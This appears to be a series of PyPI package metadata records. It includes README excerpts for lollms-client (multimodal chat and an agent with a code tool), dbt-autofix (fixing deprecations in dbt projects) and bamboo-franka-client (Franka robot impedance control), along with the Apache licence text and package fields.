img1_b64 = create_dummy_image("Image 1: Apple", tmpdir) img2_b64 = create_dummy_image("Image 2: Cat", tmpdir) img3_b64 = create_dummy_image("Image 3: Dog", tmpdir) if not img1_b64 or not img2_b64 or not img3_b64: ASCIIColors.warning("Skipping image activation example due to image creation failure (likely missing Pillow or font).") exit() discussion.add_message( sender="user", content="What is in the second image?", images=[img1_b64, img2_b64, img3_b64] ) user_message = discussion.get_messages()[-1] # --- 3. Check the initial state --- ASCIIColors.magenta("--- Initial State (All 3 Images Active) ---") status_before = discussion.get_context_status() # The 'content' field for message history will indicate the number of images if present print(f"Message History Text (showing active images):\n{status_before['zones']['message_history']['content']}") # --- 4. Deactivate irrelevant images --- ASCIIColors.magenta("\n--- Deactivating images 1 and 3 ---") user_message.toggle_image_activation(index=0, active=False) # Deactivate first image (Apple) user_message.toggle_image_activation(index=2, active=False) # Deactivate third image (Dog) discussion.commit() # Save changes to the message # --- 5. Check the new state --- ASCIIColors.magenta("\n--- New State (Only Image 2 is Active) ---") status_after = discussion.get_context_status() print(f"Message History Text (showing active images):\n{status_after['zones']['message_history']['content']}") ASCIIColors.green("\nNotice the message now says '(1 image(s) attached)' instead of 3, and only the active image will be sent to the multimodal LLM.") ASCIIColors.green("To confirm, let's ask the model what it sees:") # This will send only the activated image response = discussion.chat( user_message="What do you see in the image(s) attached to my last message?", # Use a streaming callback to see the response streaming_callback=lambda chunk, type, **k: print(chunk, end="", flush=True) if type==MSG_TYPE.MSG_TYPE_CHUNK else None ) print("\n") ASCIIColors.green(f"Assistant's response after toggling images: {response['ai_message'].content}") ``` **Note:** The image generation helper in the example requires `Pillow` (`pip install Pillow`). It also attempts to find common system fonts; if issues persist, you might need to install `matplotlib` for better font handling or provide a specific font path. ### Putting It All Together: An Advanced Agentic Example Let's create a **Python Coder Agent**. This agent will use a set of coding rules from a local file as its knowledge base and will be equipped with a tool to execute the code it writes. This demonstrates the synergy between `LollmsPersonality` (with `data_source` and `active_mcps`), `LollmsDiscussion`, and the MCP system. #### Step 1: Create the Knowledge Base (`coding_rules.txt`) Create a simple text file with the rules our agent must follow. ```text # File: coding_rules.txt 1. All Python functions must include a Google-style docstring. 2. Use type hints for all function parameters and return values. 3. The main execution block should be protected by `if __name__ == "__main__":`. 4. After defining a function, add a simple example of its usage inside the main block. 5. Print the output of the example usage to the console. ``` #### Step 2: The Main Script (`agent_example.py`) This script will define the personality, initialize the client, and run the agent. ```python from pathlib import Path from lollms_client import LollmsClient, LollmsPersonality, LollmsDiscussion, MSG_TYPE from ascii_colors import ASCIIColors, trace_exception import json import tempfile import os # A detailed callback to visualize the agent's process def agent_callback(chunk: str, msg_type: MSG_TYPE, params: dict = None, **kwargs) -> bool: if not params: params = {} if msg_type == MSG_TYPE.MSG_TYPE_STEP: ASCIIColors.yellow(f"\n>> Agent Step: {chunk}") elif msg_type == MSG_TYPE.MSG_TYPE_STEP_START: ASCIIColors.yellow(f"\n>> Agent Step Start: {chunk}") elif msg_type == MSG_TYPE.MSG_TYPE_STEP_END: result = params.get('result', '') # Only print a snippet of result to avoid overwhelming console for large outputs if isinstance(result, dict): result_str = json.dumps(result)[:150] + ("..." if len(json.dumps(result)) > 150 else "") else: result_str = str(result)[:150] + ("..." if len(str(result)) > 150 else "") ASCIIColors.green(f"<< Agent Step End: {chunk} -> Result: {result_str}") elif msg_type == MSG_TYPE.MSG_TYPE_THOUGHT_CONTENT: ASCIIColors.magenta(f"🤔 Agent Thought: {chunk}") elif msg_type == MSG_TYPE.MSG_TYPE_TOOL_CALL: tool_name = params.get('name', 'unknown_tool') tool_params = params.get('parameters', {}) ASCIIColors.blue(f"🛠️ Agent Action: Called '{tool_name}' with {tool_params}") elif msg_type == MSG_TYPE.MSG_TYPE_TOOL_OUTPUT: ASCIIColors.cyan(f"👀 Agent Observation (Tool Output): {params.get('result', 'No result')}") elif msg_type == MSG_TYPE.MSG_TYPE_CHUNK: print(chunk, end="", flush=True) # Final answer stream return True # Create a temporary directory for the discussion DB and coding rules file with tempfile.TemporaryDirectory() as tmpdir: db_path = Path(tmpdir) / "agent_discussion.db" # Create the coding rules file rules_path = Path(tmpdir) / "coding_rules.txt" rules_content = """ 1. All Python functions must include a Google-style docstring. 2. Use type hints for all function parameters and return values. 3. The main execution block should be protected by `if __name__ == "__main__":`. 4. After defining a function, add a simple example of its usage inside the main block. 5. Print the output of the example usage to the console. """ rules_path.write_text(rules_content.strip()) ASCIIColors.yellow(f"Created temporary coding rules file at: {rules_path}") try: # --- 1. Load the knowledge base from the file --- coding_rules = rules_path.read_text() # --- 2. Define the Coder Agent Personality --- coder_personality = LollmsPersonality( name="Python Coder Agent", author="lollms-client", category="Coding", description="An agent that writes and executes Python code according to specific rules.", system_prompt=( "You are an expert Python programmer. Your task is to write clean, executable Python code based on the user's request. " "You MUST strictly follow all rules provided in the 'Personality Static Data' section. " "First, think about the plan. Then, use the `python_code_interpreter` tool to write and execute the code. " "Finally, present the code and its output to the user." ), # A) Attach the static knowledge base data_source=coding_rules, # B) Equip the agent with a code execution tool active_mcps=["python_code_interpreter"] ) # --- 3. Initialize the Client and Discussion --- # A code-specialized model is recommended (e.g., codellama, deepseek-coder) # Ensure Ollama is running and 'codellama' model is pulled (e.g., ollama pull codellama) lc = LollmsClient( llm_binding_name="ollama", llm_binding_config={ "model_name": "codellama", "host_address": "http://localhost:11434" }, mcp_binding_name="local_mcp" # Enable the local tool execution engine ) # For agentic workflows, it's often good to have a persistent discussion db_manager = LollmsDataManager(f"sqlite:///{db_path}") discussion = LollmsDiscussion.create_new(lollms_client=lc, db_manager=db_manager) # --- 4. The User's Request --- user_prompt = "Write a Python function that takes two numbers and returns their sum." ASCIIColors.yellow(f"User Prompt: {user_prompt}") print("\n" + "="*50 + "\nAgent is now running...\n" + "="*50) # --- 5. Run the Agentic Chat Turn --- response = discussion.chat( user_message=user_prompt, personality=coder_personality, streaming_callback=agent_callback, max_llm_iterations=5, # Limit iterations for faster demo tool_call_decision_temperature=0.0 # Make decision more deterministic ) print("\n\n" + "="*50 + "\nAgent finished.\n" + "="*50) # --- 6. Inspect the results --- ai_message = response['ai_message'] ASCIIColors.green("\n--- Final Answer from Agent ---") print(ai_message.content) ASCIIColors.magenta("\n--- Tool Calls Made (from metadata) ---") if "tool_calls" in ai_message.metadata: print(json.dumps(ai_message.metadata["tool_calls"], indent=2)) else: print("No tool calls recorded in message metadata.") except Exception as e: ASCIIColors.error(f"An error occurred during agent execution: {e}") ASCIIColors.warning("Please ensure Ollama is running, 'codellama' model is pulled, and 'local_mcp' binding is available.") trace_exception(e) # Provide detailed traceback ``` #### Step 3: What Happens Under the Hood When you run `agent_example.py`, a sophisticated process unfolds: 1. **Initialization:** The `LollmsDiscussion.chat()` method is called with the `coder_personality`. 2. **Knowledge Injection:** The `chat` method sees that `personality.data_source` is a string. It automatically takes the content of `coding_rules.txt` and injects it into the discussion's data zones. 3. **Tool Activation:** The method also sees `personality.active_mcps`. It enables the `python_code_interpreter` tool for this turn. 4. **Context Assembly:** The `LollmsClient` assembles a rich prompt for the LLM that includes: * The personality's `system_prompt`. * The content of `coding_rules.txt` (from the data zones). * The list of available tools (including `python_code_interpreter`). * The user's request ("Write a function..."). 5. **Reason and Act:** The LLM, now fully briefed, reasons that it needs to use the `python_code_interpreter` tool. It formulate the Python code *according to the rules it was given*. 6. **Tool Execution:** The `local_mcp` binding receives the code and executes it in a secure local environment. It captures any output (`stdout`, `stderr`) and results. 7. **Observation:** The execution results are sent back to the LLM as an "observation." 8. **Final Synthesis:** The LLM now has the user's request, the rules, the code it wrote, and the code's output. It synthesizes all of this into a final, comprehensive answer for the user. This example showcases how `lollms-client` allows you to build powerful, knowledgeable, and capable agents by simply composing personalities with data and tools. ## Using LoLLMs Client with Different Bindings `lollms-client` supports a wide range of LLM backends through its binding system. This section provides practical examples of how to initialize `LollmsClient` for each of the major supported bindings. ### A New Configuration Model Configuration for all bindings has been unified. Instead of passing parameters like `host_address` or `model_name` directly to the `LollmsClient` constructor, you now pass them inside a single dictionary: `llm_binding_config`. This approach provides a clean, consistent, and extensible way to manage settings for any backend. Each binding defines its own set of required and optional parameters (e.g., `host_address`, `model_name`, `service_key`, `n_gpu_layers`). ```python # General configuration pattern from lollms_client import LollmsClient # ... other imports as needed # lc = LollmsClient( # llm_binding_name="your_binding_name", # llm_binding_config={ # "parameter_1_for_this_binding": "value_1", # "parameter_2_for_this_binding": "value_2", # # ... and so on # } # ) ``` --- ### 1. Core and Local Server Bindings These bindings connect to servers running on your local network, including the core LoLLMs server itself. #### **LoLLMs (Default Binding)** This connects to a running LoLLMs service, which acts as a powerful backend providing access to models, personalities, and tools. This is the default and most feature-rich way to use `lollms-client`. **Prerequisites:** * A LoLLMs server instance installed and running (e.g., `lollms-webui`). * An API key can be generated from the LoLLMs web UI (under User Settings -> Security) if security is enabled. **Usage:** ```python from lollms_client import LollmsClient from ascii_colors import ASCIIColors import os try: # The default port for a LoLLMs server is 9642 (a nod to The Hitchhiker's Guide to the Galaxy). # The API key can also be set via the LOLLMS_API_KEY environment variable. config = { "host_address": "http://localhost:9642", # "service_key": "your_lollms_api_key_here" # Uncomment and replace if security is enabled # "verify_ssl_certificate": True #if false the ssl certifcate verification will be ignored (only used when using https in lollms service address) } lc = LollmsClient( llm_binding_name="lollms", # This is the default, so specifying it is optional llm_binding_config=config ) response = lc.generate_text("What is the answer to life, the universe, and everything?") ASCIIColors.green(f"\nResponse from LoLLMs: {response}") except ConnectionRefusedError: ASCIIColors.error("Connection refused. Is the LoLLMs server running at http://localhost:9642?") except ValueError as ve: ASCIIColors.error(f"Initialization Error: {ve}") except Exception as e: ASCIIColors.error(f"An unexpected error occurred: {e}") ``` ##
text/markdown
null
ParisNeo <parisneoai@gmail.com>
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "License :: O...
[]
null
null
>=3.7
[]
[]
[]
[ "httpx", "requests", "ascii-colors", "pipmaster>=1.0.5", "pyyaml", "tiktoken", "pydantic", "numpy", "pillow", "sqlalchemy", "jsonschema" ]
[]
[]
[]
[ "Homepage, https://github.com/ParisNeo/lollms_client" ]
twine/6.1.0 CPython/3.11.9
2026-02-19T22:10:39.219550
lollms_client-1.11.7.tar.gz
394,597
90/aa/68f91683a3a0401cc6a2a00eaddb881dacedd97aec2afd3f094e214ebfc1/lollms_client-1.11.7.tar.gz
source
sdist
null
false
cdafc6814f765f30e5f3ab46df52b90a
4d92317cea99305e46993d27319033a51f4d74ae7b44d930495a0c66bc50d399
90aa68f91683a3a0401cc6a2a00eaddb881dacedd97aec2afd3f094e214ebfc1
null
[ "LICENSE" ]
277
2.4
dbt-autofix
0.20.0
CLI to autofix deprecations in dbt projects
# dbt-autofix dbt-autofix automatically scans your dbt project for deprecated configurations and updates them to align with the latest best practices. This makes it easier to resolve deprecation warnings introduced in dbt v1.10 as well as prepare for migration to the dbt Fusion engine. ***NEW in version 0.17.0***: dbt-autofix can now check package dependencies for compatibility with dbt Fusion and dbt 2.0 and automatically upgrade packages to newer compatible versions. See `packages` in the `Usage` section below for more detail. There will also be cases that dbt-autofix cannot resolve and require manual intervention. For those scenarios, using AI Agents can be helpfiul see the below section on [Using `AGENTS.md`](#using-agentsmd). Even if you don't intend to use LLMs, the [`AGENTS.md`](./AGENTS.md) can be a very helpful guidance for work that may need to be done after autofix has done it's part. ## Deprecation Coverage - Project Files The following deprecations are covered by `dbt-autofix deprecations`: | Deprecation Code in dbt Core | Files | Handling | Support | Behavior Change | | --------------------------------- | ----------------- | ------------------------------------------------------------------------------------------------ | ------- | --------------- | | `PropertyMovedToConfigDeprecation` | YAML files | Move all deprecated property-level configs under `config:` in YAML files across all resource types (models, exposures, owners, etc) | Full | No | | `CustomKeyInObjectDeprecation` | YAML files | Move all models extra config (not valid or custom) under `meta:` and `meta` under `config:` | Full | No | | `DuplicateYAMLKeysDeprecation` | YAML files | Remove duplicate keys in YAML files, keeping the second one to keep the same behaviour | Full | No | | `CustomTopLevelKeyDeprecation` | YAML files | Delete custom top-level key-value pairs in YAML files | Full | No | | `UnexpectedJinjaBlockDeprecation` | SQL files | Remove extra `{% endmacro %}` and `{% endif %}` that don't have corresponding opening statements | Full | No | | `MissingPlusPrefixDeprecation` | `dbt_project.yml` | Prefix all built-in configs for models/tests etc... with a `+` | Partial (Does not yet prefix custom configs) | No | | `ConfigDataPathDeprecation` | `dbt_project.yml` | Remove deprecated config for data path (now seed) | Full | No | | `ConfigLogPathDeprecation` | `dbt_project.yml` | Remove deprecated config for log path | Full | No | | `ConfigSourcePathDeprecation` | `dbt_project.yml` | Remove deprecated config for source path | Full | No | | `ConfigTargetPathDeprecation` | `dbt_project.yml` | Remove deprecated config for target path | Full | No | | `ExposureNameDeprecation` | YAML files | Replaces spaces with underscores and removes non-alphanumeric characters in exposure names | Full | Yes | | `ResourceNamesWithSpacesDeprecation` | SQL files, YAML files | Replaces spaces with underscores in resource names, updating .sql filenames as necessary | Full | Yes | | `SourceFreshnessProjectHooksNotRun` | `dbt_project.yml` | Set `source_freshness_run_project_hooks` in `dbt_project.yml` "flags" to true | Full | Yes | | `MissingArgumentsPropertyInGenericTestDeprecation` | YAML files | Move any keyword arguments defined as top-level property on generic test to `arguments` property | Full | No | ## Deprecation Coverage - CLI Commands The following deprecations are covered by `dbt-autofix jobs`: | Deprecation Code in dbt | Handling | Support | Behavior Change | | ---------------------------------------------- | ------------------------------------- | ------- | --------------- | | `ModelParamUsageDeprecation` | Replace -m/--model with -s/--select | Full | No | | `CustomOutputPathInSourceFreshnessDeprecation` | Remove -o/--output usage in `dbt source freshness` commands | Full | Yes | ## Installation ### In dbt Studio If you are using dbt Studio, no installation is needed. You can run `dbt-autofix` in the Studio command line just like you run other commands like `dbt build`. ### From PyPi #### With uv (recommended) We recommend using `uv`/`uvx` to run the package. If you don't have `uv` installed, you can install `uv` and `uvx`, [following the instructions on the offical website](https://docs.astral.sh/uv/getting-started/installation/). - to run the latest version of the tool: `uvx dbt-autofix` - to run a specific version of the tool: `uvx dbt-autofix@0.1.2` - to install the tool as a dedicated CLI: `uv tool install dbt-autofix` - to upgrade the tool installed as a dedicated CLI: `uv tool upgrade dbt-autofix` #### With pip You can also use `pip` if you prefer, but we then recommend installing the tool in its own Python virtual environment. Once in a venv, install the tool with `pip install dbt-autofix` and then run `dbt-autofix ...` ### From the source repo To run it from the git repo directly, install `uv` [following those instructions](https://docs.astral.sh/uv/getting-started/installation/) and then: run the tool directly ```sh uvx --from git+https://github.com/dbt-labs/dbt-autofix.git dbt-autofix --help ``` or install it so that it can be run with `dbt-autofix` in the future ```sh uv tool install --from git+https://github.com/dbt-labs/dbt-autofix.git dbt-autofix ``` ## Usage ### `deprecations` - the main one - `dbt-autofix deprecations`: refactor YAML and SQL files to fix some deprecations - add `--path <mypath>` to configure the path of the dbt project (defaults to `.`) - add `--dry-run` for running in dry run mode - add `--json` to get resulting data in a JSONL format - add `--json-schema-version v2.0.0-beta.4` to get the JSON schema from a specific Fusion release (by default we pick the latest) - add `--select <path>` to only select files in a given path (by default the tool will look at all files of the dbt project) - add `--include-packages` to also autofix the packages installed. Just note that those fixes will be reverted at the next `dbt deps` and the long term fix will be to update the packages to versions compatible with Fusion. - add `--include-private-packages` to autofix just the _private_ packages (those not on [hub.getdbt.com](https://hub.getdbt.com/)) installed. Just note that those fixes will be reverted at the next `dbt deps` and the long term fix will be to update the packages to versions compatible with Fusion. - add `--behavior-change` to run the _subset_ of fixes that would resolve deprecations that require a behavior change. Refer to the coverage tables above to determine which deprecations require behavior changes. - add `--all` to run all of the fixes possible - both fixes that potentially require behavior changes as well as not. Additionally, `--all` will apply fixes to as many files as possible, even if some files are unfixable (e.g. due to invalid yaml syntax). Each JSON object will have the following keys: - "mode": "applied" or "dry_run" - "file_path": the full path of the file modified. Each file will appear only once - "refactors": the list of refactoring rules applied Calling `deprecations` without `--dry-run` should be safe if your dbt code is part of a git repo. Please review the suggested changes to your dbt project before merging to `main` and make those changes go through your typical CI/CD process. ### `packages` - the new one - `dbt-autofix packages`: scan package dependencies for compatibility with Fusion and dbt 2.0 and modify packages.yml or dependencies.yml to upgrade any incompatible packages to a newer compatible version - add `--force-upgrade` to override the version range currently defined in your project's packages.yml/dependencies.yml - add `--path <mypath>` to configure the path of the dbt project (defaults to `.`) - add `--dry-run` for running in dry run mode - add `--json` to get resulting data in a JSONL format If any packages are upgraded, you must run `dbt deps` in your project to install the new versions and update your lock file. Each JSON object will have the following keys: - "mode": "applied" or "dry_run" - "file_path": the full path of the file modified - "upgrades": the list of packages upgraded to newer versions - "unchanged": the list of packages not upgraded and the reason for not upgrading, including: - Package is already compatible with Fusion and no update is required - Package is not compatible with Fusion and Package Hub does not have a newer version with Fusion compatibility - Package has not defined Fusion compatibility using `require-dbt-version` Calling `packages` without `--dry-run` should be safe if your dbt code is part of a git repo. Please review the suggested changes to your dbt project before merging to `main` and make those changes go through your typical CI/CD process. ### `jobs` `dbt-autofix jobs`: update dbt platform jobs steps to use `-s`/`--select` selectors instead of `-m`/`--models`/`--model` which are deprecated in the Fusion engine Run `dbt-autofix jobs --help` to see the required parameters and supported arguments. This tool requires connecting to the dbt Admin API to retrieve and update jobs which means that the user token or service token used need to have Read and Write access to jobs Running with `--dry-run`/`d` will output what changes would have been triggered without triggering them Running with `--behavior-changes` will run the _subset_ of fixes that would resolve deprecations that require a behavior change. Refer to the coverage tables above to determine which deprecations require behavior changes. ### Using `AGENTS.md` [`AGENTS.md`](./AGENTS.md) is provided as a reference and starting place for those interested in using AI agents in Cursor, Copilot Chat, and Claude Code to try resolving remaining errors after running dbt-autofix. **To use AGENTS.md:** 1. Download AGENTS.md and the /manual_fixes/ directory (you can remove these files after using the agentic autofix workflow) 2. Add AGENTS.md as context to the chat or Claude Code 3. Be very specific in your prompt to provide the proper guardrails and avoid AI hallucinations **Sample prompt:** Please make my dbt project compatible with Fusion by strictly following the instructions in AGENTS.md. Please read AGENTS.md and dependent resources in full before you start, and take time planning and thinking through steps. **Share your manual fixes!** Have you had to make manual adjustments to get your dbt project working with Fusion? We’d love for you to contribute them back to the community through this agentic workflow! The `/manual_fixes/` folder is a collection of real examples where users have solved compatibility issues manually, and we would love your contribution to it. Your contribution helps improve autofix for everyone and can prevent others from hitting the same issue. ### Pre-commit Hooks You can use `dbt-autofix` as a pre-commit hook to automatically catch and fix deprecations before committing code. Add the following to your `.pre-commit-config.yaml`: ```yaml repos: - repo: https://github.com/dbt-labs/dbt-autofix rev: v0.13.x # or 'main' or 'HEAD' hooks: - id: dbt-autofix-check # Check for deprecations without making changes # OR - id: dbt-autofix-fix # Automatically fix deprecations # OR - id: dbt-autofix-fix # Pass in multiple args args: [--semantic-layer, --include-packages, --behavior-change] # OR - id: dbt-autofix-fix # Specify dbt project path args: [--path=jaffle-shop] ```
text/markdown
null
null
null
null
null
null
[]
[]
null
null
<3.14,>=3.10
[]
[]
[]
[ "click<9.0.0,>=8.2.0", "dbt-extractor<=0.6,>=0.5.0", "dbt-fusion-package-tools==0.20.0", "httpx>=0.27.0", "jinja2<4,>=3.1.3", "pyyaml>=6.0.2; python_version >= \"3.13\"", "pyyaml>=6.0; python_version < \"3.13\"", "rich>=13.7.0", "ruamel-yaml<0.18.15,>=0.18.10", "typer>=0.16.0", "yamllint>=1.37.0...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:10:38.220107
dbt_autofix-0.20.0.tar.gz
250,484
30/e6/efa7241ca507fa86f1ec0bd6f61ed87644b19bd56301323d171b9b3c5d50/dbt_autofix-0.20.0.tar.gz
source
sdist
null
false
bb8b624762dd64f8358320cb53c97277
391d6e22995cf9a75ab0af1cb55a5b2940ecfbd56cc4f7b1a9cd983927ee120c
30e6efa7241ca507fa86f1ec0bd6f61ed87644b19bd56301323d171b9b3c5d50
null
[ "LICENSE" ]
722
2.4
bamboo-franka-client
0.1.0
Bamboo Franka Robot Control with Joint Impedance Control
# Bamboo Franka Controller A lightweight package for controlling the Franka Emika FR3 and Panda with joint impedance control and controlling Robotiq grippers. A single real-time controller machine runs the control node and maintains the real-time link with the FR3/Panda. Other machines can connect to this node using the Bamboo client via ZMQ to issue commands or receive robot state. ## Control Node Installation Install the control node on the real-time control machine that is directly connected to the Franka robot. ### Prerequisites 1. Ensure that the [`libfranka` system requirements](https://github.com/frankarobotics/libfranka/tree/release-0.15.2?tab=readme-ov-file#1-system-requirements) are satisfied 2. Ensure that the [`libfranka` dependencies](https://github.com/frankarobotics/libfranka/tree/release-0.15.2?tab=readme-ov-file#1-system-requirements) are installed 3. **If using libfranka >= 0.14.0:** Install Pinocchio following the [libfranka dependency instructions](https://github.com/frankarobotics/libfranka/tree/release-0.15.2?tab=readme-ov-file#2-installing-dependencies) before running the installation script 4. Make sure you have set the inertial parameters for the Robotiq gripper in Franka Desk. You can follow the [instructions in DROID](https://droid-dataset.github.io/droid/software-setup/host-installation.html#updating-inertia-parameters-for-robotiq-gripper) for doing this. ### Build Controller ```bash # Follow the instructions in the script bash InstallBambooController ``` **Note:** This script builds `libfranka` locally and **will not override any system installations**. The installation script may request sudo privileges to add user groups and install system packages. You will be prompted before any sudo commands are executed. You will also be prompted to enter the version of libfranka to install. This can be determined by: - Checking the FCI version in the Franka Desk (under Settings > Dashboard > Control) and then consulting the [FCI Compatability Table](https://frankarobotics.github.io/docs/compatibility.html) for a compatible `libfranka` version - Checking what libfranka versions you already have in other projects, you could run: ```bash locate libfranka.so ``` The `InstallBambooController` script will automatically handle: - Adding your user to required groups (`realtime` for real-time kernel operations, `dialout` and `tty` for serial communication with Robotiq gripper) - Installing system packages (`libzmq3-dev` for ZMQ networking, `libmsgpack-dev` for message serialization, `libpoco-dev` for Franka dependencies) - Cloning and building `libfranka` **Important:** If groups are added during installation, **you must log out and log back in** before running the controller. ### Manual Installation If you prefer to install manually, refer to the steps in the [`InstallBambooController`](InstallBambooController) script. ## Bamboo Client Installation You should install the Bamboo client on any machine that will talk to the control node. This installation only includes the client dependencies (numpy, pyzmq, msgpack) and not the hardware control dependencies. **Install from PyPI:** ```bash pip install bamboo-franka-client ``` **Install from GitHub repository:** ```bash pip install git+https://github.com/chsahit/bamboo.git ``` **Install from source:** ```bash git clone https://github.com/chsahit/bamboo.git cd bamboo pip install -e . ``` **If you need Robotiq gripper server dependencies** (pyserial, pymodbus) on a non-control node machine: ```bash pip install -e .[server] ``` ## Usage ### Server-Side Robot Control **Security Warning:** By default, the controller listens on all network interfaces (`*` or `0.0.0.0`), accepting commands from any IP address that can reach the machine. For security, consider restricting access by setting the listen address using the `--listen_ip` flag in `RunBambooController` (or the equivalent configuration option): for example, use `127.0.0.1` to accept commands only from the local machine, or a specific interface address such as `192.168.1.10` to accept commands only from that network. Avoid using `*`/`0.0.0.0` on untrusted or publicly accessible networks unless you have additional protections in place (VPN, firewall, etc.). **Easy Start (Recommended):** Use the provided script to start both control node and gripper server in tmux: ```bash bash RunBambooController ``` The script supports configuration flags: ```bash bash RunBambooController start --robot_ip 172.16.0.2 --control_port 5555 --listen_ip "*" --gripper_device /dev/ttyUSB0 --gripper_port 5559 --conda_env bamboo ``` Available options: - `--robot_ip`: Robot IP address (default: 172.16.0.2) - `--control_port`: 